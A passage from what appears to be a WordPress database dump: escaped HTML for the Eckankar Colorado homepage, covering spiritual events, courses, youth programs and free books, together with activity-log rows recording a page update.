src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(237048,40284,'_message_key','post_updated'),(237049,40284,'_user_id','2'),(237050,40284,'_user_login','S8zhaBda'),(237051,40284,'_user_email','nada@zipnadanot.org'),(237052,40284,'_server_remote_addr','76.130.120.x'),(237053,40284,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(237054,40285,'post_id','7160'),(237055,40285,'post_type','page'),(237056,40285,'post_title','Home'),(237057,40285,'post_prev_post_content','\r\n<div style=\"height: 150px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\" ><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section 